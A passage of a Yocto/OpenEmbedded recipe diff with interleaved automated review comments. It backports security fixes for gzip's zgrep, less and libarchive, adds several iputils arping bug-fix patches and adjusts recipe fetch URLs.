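+file://CVE-2023-36664-pre1.patch \
+file://CVE-2023-36664-1.patch \
+file://CVE-2023-36664-2.patch \
+file://CVE-2023-43115.patch \
+file://CVE-2020-36773.patch \
 "
 
 SRC_URI = "${SRC_URI_BASE} \
 file://ghostscript-9.21-prevent_recompiling.patch \
 file://cups-no-gcrypt.patch \
-file://CVE-2020-15900.patch \
 "
 
 SRC_URI_class-native = "${SRC_URI_BASE} \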
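Review bot: `CVE_CHECK_WHITELIST += "CVE-2013-6629"` is unconditional, but the justification in the comment (an external jpeg is used) depends on how the recipe is configured. If any variant, for example class-native, builds the bundled jpeg sources, the whitelist entry hides a real finding. Please confirm that every variant links the external libjpeg, or name in the comment the configure option that guarantees it. Moving `file://CVE-2020-15900.patch` from SRC_URI into SRC_URI_BASE also makes it apply to the native build, which looks intended but is not mentioned.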
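--- a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
+++ b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302"
 
-SRC_URI = "git://${GO_IMPORT}"
+SRC_URI = "git://${GO_IMPORT};branch=master"
 SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe"
 UPSTREAM_CHECK_COMMITS = "1"
 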
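Review bot: The fetch URL `git://${GO_IMPORT};branch=master` sets the branch but names no transport, so the fetcher presumably falls back to its default for `git://`, the unauthenticated git protocol. SRCREV pins the commit, so the fetched content is still checked by hash. Adding `;protocol=https` would move the fetch to an authenticated, encrypted transport and avoid failures where the plain git port is blocked.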
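--- a/meta/recipes-extended/grep/grep_3.4.bb
+++ b/meta/recipes-extended/grep/grep_3.4.bb
@@ -1,5 +1,6 @@
 SUMMARY = "GNU grep utility"
 HOMEPAGE = "http://savannah.gnu.org/projects/grep/"
+DESCRIPTION = "Grep searches one or more input files for lines containing a match to a specified pattern. By default, grep prints the matching lines."
 BUGTRACKER = "http://savannah.gnu.org/bugs/?group=grep"
 SECTION = "console/utils"
 LICENSE = "GPLv3"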
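--- a/meta/recipes-extended/groff/groff_1.22.4.bb
+++ b/meta/recipes-extended/groff/groff_1.22.4.bb
@@ -20,7 +20,6 @@ SRC_URI[sha256sum] = "e78e7b4cb7dec310849004fa88847c44701e8d133b5d4c13057d876c1b
 
 # Remove at the next upgrade
 PR = "r1"
-HASHEQUIV_HASH_VERSION .= ".1"
 
 DEPENDS = "bison-native"
 RDEPENDS_${PN} += "perl sed"
@@ -63,6 +62,10 @@ do_install_append() {
 rm -rf ${D}${bindir}/glilypond
 rm -rf ${D}${libdir}/groff/glilypond
 rm -rf ${D}${mandir}/man1/glilypond*
+
+# not ship /usr/bin/grap2graph and its releated man files
+rm -rf ${D}${bindir}/grap2graph
+rm -rf ${D}${mandir}/man1/grap2graph*
 }
 
 do_install_append_class-native() {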
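Review bot: The new comment `# not ship /usr/bin/grap2graph and its releated man files` misspells "related" and does not say why the tool is dropped. Rewording it to state the reason (a missing runtime dependency, a host path baked into the script, or whatever applies) would help whoever revisits this at the next upgrade. Removing `HASHEQUIV_HASH_VERSION .= ".1"` while `PR = "r1"` stays under "Remove at the next upgrade" is presumably deliberate, and a line in the commit message would confirm it.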
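--- /dev/null
+++ b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch
@@ -0,0 +1,45 @@
+From 7073a366ee71639a1902eefb7500e14acb920f64 Mon Sep 17 00:00:00 2001
+From: Lasse Collin <lasse.collin@tukaani.org>
+Date: Mon, 4 Apr 2022 23:52:49 -0700
+Subject: [PATCH] zgrep: avoid exploit via multi-newline file names
+
+* zgrep.in: The issue with the old code is that with multiple
+newlines, the N-command will read the second line of input,
+then the s-commands will be skipped because it's not the end
+of the file yet, then a new sed cycle starts and the pattern
+space is printed and emptied. So only the last line or two get
+escaped. This patch makes sed read all lines into the pattern
+space and then do the escaping.
+
+This vulnerability was discovered by:
+cleemy desu wayo working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/gzip.git/commit/?id=dc9740df61e575e8c3148b7bd3c147a81ea00c7c]
+CVE: CVE-2022-1271
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+---
+zgrep.in | 10 +++++++---
+1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/zgrep.in b/zgrep.in
+index 3efdb52..d391291 100644
+--- a/zgrep.in
++++ b/zgrep.in
+@@ -222,9 +222,13 @@ do
+'* | *'&'* | *'\'* | *'|'*)
+i=$(printf '%s\n' "$i" |
+sed '
+- $!N
+- $s/[&\|]/\\&/g
+- $s/\n/\\n/g
++ :start
++ $!{
++ N
++ b start
++ }
++ s/[&\|]/\\&/g
++ s/\n/\\n/g
+');;
+esac
+sed_script="s|^|$i:|"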
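--- a/meta/recipes-extended/gzip/gzip_1.10.bb
+++ b/meta/recipes-extended/gzip/gzip_1.10.bb
@@ -4,6 +4,7 @@ LICENSE = "GPLv3+"
 
 SRC_URI = "${GNU_MIRROR}/gzip/${BP}.tar.gz \
 file://run-ptest \
+file://CVE-2022-1271.patch \
 "
 SRC_URI_append_class-target = " file://wrong-path-fix.patch"
 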
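--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch
@@ -0,0 +1,79 @@
+From 86ed08936d49e2c81ef49dfbd02aca1c74d0c098 Mon Sep 17 00:00:00 2001
+From: lac-0073 <61903197+lac-0073@users.noreply.github.com>
+Date: Mon, 26 Oct 2020 09:45:42 +0800
+Subject: [PATCH] arpping: make update neighbours work again
+
+The arping is using inconsistent sender_ip_addr and target_ip_addr in
+messages. This causes the client receiving the arp message not to update
+the arp table entries.
+
+The specific performance is as follows:
+
+There is a machine 2 with IP 10.20.30.3 configured on eth0:0 that is in the
+same IP subnet as eth0. This IP was originally used on another machine 1,
+and th IP needs to be changed back to the machine 1. When using the arping
+command to announce what ethernet address has IP 10.20.30.3, the arp table
+on machine 3 is not updated.
+
+Machine 3 original arp table:
+
+10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02
+10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Create interface eth0:0 on machine 1, and use the arping command to send arp
+packets. Expected outcome on machine 3:
+
+10.20.30.3 machine 1 eth0:0 00:00:00:00:00:01
+10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Actual results on machine 3:
+
+10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02
+10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Fixes: https://github.com/iputils/iputils/issues/298
+Fixes: 68f12fc4a0dbef4ae4c404da24040d22c5a14339
+Signed-off-by: Aichun Li <liaichun@huawei.com>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/86ed08936d49e2c81ef49dfbd02aca1c74d0c098]
+Signed-off-by: Visa Hankala <visa@hankala.org>
+---
+arping.c | 16 +++++++++-------
+1 file changed, 9 insertions(+), 7 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index a002786..53fdbb4 100644
+--- a/arping.c
++++ b/arping.c
+@@ -968,7 +968,7 @@ int main(int argc, char **argv)
+}
+memset(&saddr, 0, sizeof(saddr));
+saddr.sin_family = AF_INET;
+- if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) {
++ if (ctl.source || ctl.gsrc.s_addr) {
+saddr.sin_addr = ctl.gsrc;
+if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+error(2, errno, "bind");
+@@ -979,12 +979,14 @@ int main(int argc, char **argv)
+saddr.sin_port = htons(1025);
+saddr.sin_addr = ctl.gdst;
+
+- if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1)
+- error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)"));
+- if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+- error(2, errno, "connect");
+- if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1)
+- error(2, errno, "getsockname");
++ if (!ctl.unsolicited) {
++ if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1)
++ error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)"));
++ if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
++ error(2, errno, "connect");
++ if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1)
++ error(2, errno, "getsockname");
++ }
+ctl.gsrc = saddr.sin_addr;
+}
+close(probe_fd);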
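Review bot: In the second hunk, `ctl.gsrc = saddr.sin_addr;` runs whether or not the new `if (!ctl.unsolicited)` block executed, so in unsolicited mode it copies the value set a few lines earlier by `saddr.sin_addr = ctl.gdst;` instead of the address filled in by getsockname(). That appears to be the intent, since the commit message wants the sender and target addresses to agree, but the code leaves it implicit. A comment before the assignment, for example `/* unsolicited mode: saddr still holds gdst, so sender address == target address */`, would make the dependency on statement order explicit. The branch containing this code opens outside the hunk.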
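--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch
@@ -0,0 +1,39 @@
+From 18f14be80466ddc8fb17a400be82764a779c8dcd Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Wed, 31 Jul 2019 21:28:12 +0100
+Subject: [PATCH] arping: revert partially - fix sent vs received packages
+return value
+
+Commit 84ca65ca980315c73f929fed8b6f16bbd698c3a0 caused regression. The
+arping -D needs return value evaluation that was the earlier default, in
+other cases the new return value should be correct.
+
+Addresses: https://github.com/iputils/iputils/issues/209
+See-also: https://github.com/void-linux/void-packages/issues/13304
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/18f14be80466ddc8fb17a400be82764a779c8dcd]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+arping.c | 6 +++++-
+1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 77c9c56..2c87c15 100644
+--- a/arping.c
++++ b/arping.c
+@@ -792,7 +792,11 @@ static int event_loop(struct run_state *ctl)
+close(tfd);
+freeifaddrs(ctl->ifa0);
+rc |= finish(ctl);
+- rc |= (ctl->sent != ctl->received);
++ if (ctl->dad && ctl->quit_on_reply)
++ /* Duplicate address detection mode return value */
++ rc |= !(ctl->brd_sent != ctl->received);
++ else
++ rc |= (ctl->sent != ctl->received);
+return rc;
+}
+
+--
+2.18.4
+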
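--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch
@@ -0,0 +1,39 @@
+From 1df5350bdc952b14901fde356b17b78c2bcd4cff Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Wed, 28 Aug 2019 20:05:22 +0100
+Subject: [PATCH] arping: fix -f quit on first reply regression
+
+When arping runs together with -f 'quit on first reply' and -w <timeout>
+'how long to wait for a reply' the command needs to exit if replies are not
+received after wait period. Notice that the exit in case of lost packages
+will be 1 signifying failure. Getting a reply results to 0 exit value.
+
+Addresses: https://bugs.debian.org/935946
+Reported-by: Lucas Nussbaum <lucas@debian.org>
+Addresses: https://github.com/iputils/iputils/issues/211
+Reported-by: Noah Meyerhans <noahm@debian.org>
+Broken-since: 67e070d08dcbec990e1178360f82b3e2ca4f6d5f
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/1df5350bdc952b14901fde356b17b78c2bcd4cff]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+arping.c | 3 ++-
+1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 2c87c15..30884f6 100644
+--- a/arping.c
++++ b/arping.c
+@@ -764,7 +764,8 @@ static int event_loop(struct run_state *ctl)
+continue;
+}
+total_expires += exp;
+- if (0 < ctl->count && (uint64_t)ctl->count < total_expires) {
++ if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
++ (ctl->quit_on_reply && ctl->timeout < total_expires)) {
+exit_loop = 1;
+continue;
+}
+--
+2.18.4
+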
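--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch
@@ -0,0 +1,37 @@
+From ec821e572a640bd79aecc3922cb9001f4b6b26f2 Mon Sep 17 00:00:00 2001
+From: Petr Vorel <petr.vorel@gmail.com>
+Date: Sat, 7 Sep 2019 06:07:19 +0200
+Subject: [PATCH] arping: Fix comparison of different signedness warning
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+../arping.c:768:45: warning: comparison of integer expressions of different signedness: ‘int’ and ‘uint64_t’ {aka ‘long unsigned int’} [-Wsign-compare]
+768 | (ctl->quit_on_reply && ctl->timeout < total_expires)) {
+
+Fixes: 1df5350 ("arping: fix -f quit on first reply regression")
+Reference: https://github.com/iputils/iputils/pull/212
+Acked-by: Sami Kerola <kerolasa@iki.fi>
+Signed-off-by: Petr Vorel <petr.vorel@gmail.com>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/ec821e572a640bd79aecc3922cb9001f4b6b26f2]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+arping.c | 2 +-
+1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 2d05728..88319cd 100644
+--- a/arping.c
++++ b/arping.c
+@@ -765,7 +765,7 @@ static int event_loop(struct run_state *ctl)
+}
+total_expires += exp;
+if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
+- (ctl->quit_on_reply && ctl->timeout < total_expires)) {
++ (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) {
+exit_loop = 1;
+continue;
+}
+--
+2.18.4
+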
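--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch
@@ -0,0 +1,45 @@
+From 68f12fc4a0dbef4ae4c404da24040d22c5a14339 Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Sat, 8 Feb 2020 14:12:18 +0000
+Subject: [PATCH] arping: return success when unsolicited ARP mode destination
+does not answer
+
+Manual page is making promise answers are not expected when -U (or -A)
+option is in use. Either I am looking wrong or this has been broken since
+at the beginning of git history.
+
+Addresses: https://github.com/iputils/iputils/issues/247
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/68f12fc4a0dbef4ae4c404da24040d22c5a14339]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+arping.c | 6 ++++--
+1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index 996cf2b..5180ae0 100644
+--- a/arping.c
++++ b/arping.c
+@@ -794,7 +794,9 @@ static int event_loop(struct run_state *ctl)
+close(tfd);
+freeifaddrs(ctl->ifa0);
+rc |= finish(ctl);
+- if (ctl->dad && ctl->quit_on_reply)
++ if (ctl->unsolicited)
++ /* nothing */;
++ else if (ctl->dad && ctl->quit_on_reply)
+/* Duplicate address detection mode return value */
+rc |= !(ctl->brd_sent != ctl->received);
+else
+@@ -943,7 +945,7 @@ int main(int argc, char **argv)
+}
+memset(&saddr, 0, sizeof(saddr));
+saddr.sin_family = AF_INET;
+- if (ctl.source || ctl.gsrc.s_addr) {
++ if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) {
+saddr.sin_addr = ctl.gsrc;
+if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+error(2, errno, "bind");
+--
+2.18.4
+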
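--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch
@@ -0,0 +1,94 @@
+From 60a27c76174c0ae23bdafde2bad4fdd18a44a7ea Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Sat, 7 Mar 2020 22:03:21 +0000
+Subject: [PATCH] arping: use additional timerfd to control when timeout
+happens
+
+Trying to determine timeout by adding up interval values is pointlessly
+complicating. With separate timer everything just works.
+
+Addresses: https://github.com/iputils/iputils/issues/259
+Fixes: 1df5350bdc952b14901fde356b17b78c2bcd4cff
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/e594ca52afde89746b7d79c875fe9d6aea1850ac]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+arping.c | 29 ++++++++++++++++++++++++++---
+1 file changed, 26 insertions(+), 3 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index 61db3a6..7284351 100644
+--- a/arping.c
++++ b/arping.c
+@@ -670,6 +670,7 @@ static int event_loop(struct run_state *ctl)
+enum {
+POLLFD_SIGNAL = 0,
+POLLFD_TIMER,
++ POLLFD_TIMEOUT,
+POLLFD_SOCKET,
+POLLFD_COUNT
+};
+@@ -686,6 +687,13 @@ static int event_loop(struct run_state *ctl)
+.it_value.tv_sec = ctl->interval,
+.it_value.tv_nsec = 0
+};
++ int timeoutfd;
++ struct itimerspec timeoutfd_vals = {
++ .it_interval.tv_sec = ctl->timeout,
++ .it_interval.tv_nsec = 0,
++ .it_value.tv_sec = ctl->timeout,
++ .it_value.tv_nsec = 0
++ };
+uint64_t exp, total_expires = 1;
+
+unsigned char packet[4096];
+@@ -709,7 +717,7 @@ static int event_loop(struct run_state *ctl)
+pfds[POLLFD_SIGNAL].fd = sfd;
+pfds[POLLFD_SIGNAL].events = POLLIN | POLLERR | POLLHUP;
+
+- /* timerfd */
++ /* interval timerfd */
+tfd = timerfd_create(CLOCK_MONOTONIC, 0);
+if (tfd == -1) {
+error(0, errno, "timerfd_create failed");
+@@ -722,6 +730,19 @@ static int event_loop(struct run_state *ctl)
+pfds[POLLFD_TIMER].fd = tfd;
+pfds[POLLFD_TIMER].events = POLLIN | POLLERR | POLLHUP;
+
++ /* timeout timerfd */
++ timeoutfd = timerfd_create(CLOCK_MONOTONIC, 0);
++ if (tfd == -1) {
++ error(0, errno, "timerfd_create failed");
++ return 1;
++ }
++ if (timerfd_settime(timeoutfd, 0, &timeoutfd_vals, NULL)) {
++ error(0, errno, "timerfd_settime failed");
++ return 1;
++ }
++ pfds[POLLFD_TIMEOUT].fd = timeoutfd;
++ pfds[POLLFD_TIMEOUT].events = POLLIN | POLLERR | POLLHUP;
++
+/* socket */
+pfds[POLLFD_SOCKET].fd = ctl->socketfd;
+pfds[POLLFD_SOCKET].events = POLLIN | POLLERR | POLLHUP;
+@@ -764,13 +785,15 @@ static int event_loop(struct run_state *ctl)
+continue;
+}
+total_expires += exp;
+- if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
+- (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) {
++ if (0 < ctl->count && (uint64_t)ctl->count < total_expires) {
+exit_loop = 1;
+continue;
+}
+send_pack(ctl);
+break;
++ case POLLFD_TIMEOUT:
++ exit_loop = 1;
++ break;
+case POLLFD_SOCKET:
+if ((s =
+recvfrom(ctl->socketfd, packet, sizeof(packet), 0,
+--
+2.18.4
+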
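Review bot: The error check after the second `timerfd_create()` tests the wrong descriptor: `timeoutfd = timerfd_create(CLOCK_MONOTONIC, 0);` is followed by `if (tfd == -1) {`, which re-tests the interval timer that was already validated above. A failed creation is therefore only caught one call later, when `timerfd_settime(timeoutfd, ...)` fails on the invalid descriptor and reports the misleading "timerfd_settime failed". The check should read `if (timeoutfd == -1) {`. Separately, no hunk in this patch closes `timeoutfd`, and the two new `return 1;` paths leave the already-created `tfd` open; event_loop() continues outside the hunks, so confirm whether cleanup happens there.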
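--- a/meta/recipes-extended/iputils/iputils_s20190709.bb
+++ b/meta/recipes-extended/iputils/iputils_s20190709.bb
@@ -10,11 +10,17 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390"
 
 DEPENDS = "gnutls"
 
-SRC_URI = "git://github.com/iputils/iputils \
+SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \
 file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \
 file://0001-ninfod-fix-systemd-Documentation-url-error.patch \
 file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \
 file://0001-iputils-Initialize-libgcrypt.patch \
+file://0001-arping-revert-partially-fix-sent-vs-received-package.patch \
+file://0002-arping-fix-f-quit-on-first-reply-regression.patch \
+file://0003-arping-Fix-comparison-of-different-signedness-warnin.patch \
+file://0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch \
+file://0005-arping-use-additional-timerfd-to-control-when-timeou.patch \
+file://0001-arping-make-update-neighbours-work-again.patch \
 "
 SRCREV = "13e00847176aa23683d68fce1d17ffb523510946"
 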
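--- /dev/null
+++ b/meta/recipes-extended/less/less/CVE-2022-48624.patch
@@ -0,0 +1,41 @@
+From c6ac6de49698be84d264a0c4c0c40bb870b10144 Mon Sep 17 00:00:00 2001
+From: Mark Nudelman <markn@greenwoodsoftware.com>
+Date: Sat, 25 Jun 2022 11:54:43 -0700
+Subject: [PATCH] Shell-quote filenames when invoking LESSCLOSE.
+
+Upstream-Status: Backport [https://github.com/gwsw/less/commit/c6ac6de49698be84d264a0c4c0c40bb870b10144]
+CVE: CVE-2022-48624
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+filename.c | 10 ++++++++--
+1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/filename.c b/filename.c
+index 5824e385..dff20c08 100644
+--- a/filename.c
++++ b/filename.c
+@@ -972,6 +972,8 @@ close_altfile(altfilename, filename)
+{
+#if HAVE_POPEN
+char *lessclose;
++ char *qfilename;
++ char *qaltfilename;
+FILE *fd;
+char *cmd;
+int len;
+@@ -986,9 +988,13 @@ close_altfile(altfilename, filename)
+error("LESSCLOSE ignored; must contain no more than 2 %%s", NULL_PARG);
+return;
+}
+- len = (int) (strlen(lessclose) + strlen(filename) + strlen(altfilename) + 2);
++ qfilename = shell_quote(filename);
++ qaltfilename = shell_quote(altfilename);
++ len = (int) (strlen(lessclose) + strlen(qfilename) + strlen(qaltfilename) + 2);
+cmd = (char *) ecalloc(len, sizeof(char));
+- SNPRINTF2(cmd, len, lessclose, filename, altfilename);
++ SNPRINTF2(cmd, len, lessclose, qfilename, qaltfilename);
++ free(qaltfilename);
++ free(qfilename);
+fd = shellcmd(cmd);
+free(cmd);
+if (fd != NULL)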
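Review bot: The two `shell_quote()` results go straight into `strlen()` and `SNPRINTF2()` with no NULL check. shell_quote() is defined outside this hunk; if it can return NULL, for instance when a name cannot be quoted for the shell in use, `strlen(qfilename)` would dereference a null pointer while less is closing a file. A guard directly after the two calls would cover that case without touching the rest of the change: `if (qfilename == NULL || qaltfilename == NULL) { free(qfilename); free(qaltfilename); return; }`. close_altfile() begins and ends outside the hunks, so confirm that the early return skips no cleanup.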
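--- a/meta/recipes-extended/less/less_551.bb
+++ b/meta/recipes-extended/less/less_551.bb
@@ -26,6 +26,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
 DEPENDS = "ncurses"
 
 SRC_URI = "http://www.greenwoodsoftware.com/${BPN}/${BPN}-${PV}.tar.gz \
+file://CVE-2022-48624.patch \
 "
 
 SRC_URI[md5sum] = "4ad4408b06d7a6626a055cb453f36819"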
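--- a/meta/recipes-extended/libaio/libaio_0.3.111.bb
+++ b/meta/recipes-extended/libaio/libaio_0.3.111.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html"
 LICENSE = "LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499"
 
-SRC_URI = "git://pagure.io/libaio.git;protocol=https \
+SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \
 file://00_arches.patch \
 file://destdir.patch \
 file://libaio_fix_for_mips_syscalls.patch \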
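--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch
@@ -0,0 +1,183 @@
+Description: Fix handling of symbolic link ACLs
+Published as CVE-2021-23177
+Origin: upstream, https://github.com/libarchive/libarchive/commit/fba4f123cc456d2b2538f811bb831483bf336bad
+Bug-Debian: https://bugs.debian.org/1001986
+Author: Martin Matuska <martin@matuska.org>
+Last-Updated: 2021-12-20
+
+CVE: CVE-2021-23177
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/libarchive/archive_disk_acl_freebsd.c
++++ b/libarchive/archive_disk_acl_freebsd.c
+@@ -319,7 +319,7 @@
+
+static int
+set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+int ae_requested_type, const char *tname)
+{
+int acl_type = 0;
+@@ -364,6 +364,13 @@
+return (ARCHIVE_FAILED);
+}
+
++ if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) {
++ errno = EINVAL;
++ archive_set_error(a, errno,
++ "Cannot set default ACL on non-directory");
++ return (ARCHIVE_WARN);
++ }
++
+acl = acl_init(entries);
+if (acl == (acl_t)NULL) {
+archive_set_error(a, errno,
+@@ -542,7 +549,10 @@
+else if (acl_set_link_np(name, acl_type, acl) != 0)
+#else
+/* FreeBSD older than 8.0 */
+- else if (acl_set_file(name, acl_type, acl) != 0)
++ else if (S_ISLNK(mode)) {
++ /* acl_set_file() follows symbolic links, skip */
++ ret = ARCHIVE_OK;
++ } else if (acl_set_file(name, acl_type, acl) != 0)
+#endif
+{
+if (errno == EOPNOTSUPP) {
+@@ -677,14 +687,14 @@
+& ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+if ((archive_acl_types(abstract_acl)
+& ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access");
+if (ret != ARCHIVE_OK)
+return (ret);
+}
+if ((archive_acl_types(abstract_acl)
+& ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0)
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default");
+
+/* Simultaneous POSIX.1e and NFSv4 is not supported */
+@@ -693,7 +703,7 @@
+#if ARCHIVE_ACL_FREEBSD_NFS4
+else if ((archive_acl_types(abstract_acl) &
+ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4");
+}
+#endif
+--- a/libarchive/archive_disk_acl_linux.c
++++ b/libarchive/archive_disk_acl_linux.c
+@@ -343,6 +343,11 @@
+return (ARCHIVE_FAILED);
+}
+
++ if (S_ISLNK(mode)) {
++ /* Linux does not support RichACLs on symbolic links */
++ return (ARCHIVE_OK);
++ }
++
+richacl = richacl_alloc(entries);
+if (richacl == NULL) {
+archive_set_error(a, errno,
+@@ -455,7 +460,7 @@
+#if ARCHIVE_ACL_LIBACL
+static int
+set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+int ae_requested_type, const char *tname)
+{
+int acl_type = 0;
+@@ -488,6 +493,18 @@
+return (ARCHIVE_FAILED);
+}
+
++ if (S_ISLNK(mode)) {
++ /* Linux does not support ACLs on symbolic links */
++ return (ARCHIVE_OK);
++ }
++
++ if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) {
++ errno = EINVAL;
++ archive_set_error(a, errno,
++ "Cannot set default ACL on non-directory");
++ return (ARCHIVE_WARN);
++ }
++
+acl = acl_init(entries);
+if (acl == (acl_t)NULL) {
+archive_set_error(a, errno,
+@@ -727,14 +744,14 @@
+& ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+if ((archive_acl_types(abstract_acl)
+& ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access");
+if (ret != ARCHIVE_OK)
+return (ret);
+}
+if ((archive_acl_types(abstract_acl)
+& ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0)
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default");
+}
+#endif /* ARCHIVE_ACL_LIBACL */
+--- a/libarchive/archive_disk_acl_sunos.c
++++ b/libarchive/archive_disk_acl_sunos.c
+@@ -443,7 +443,7 @@
+
+static int
+set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+int ae_requested_type, const char *tname)
+{
+aclent_t *aclent;
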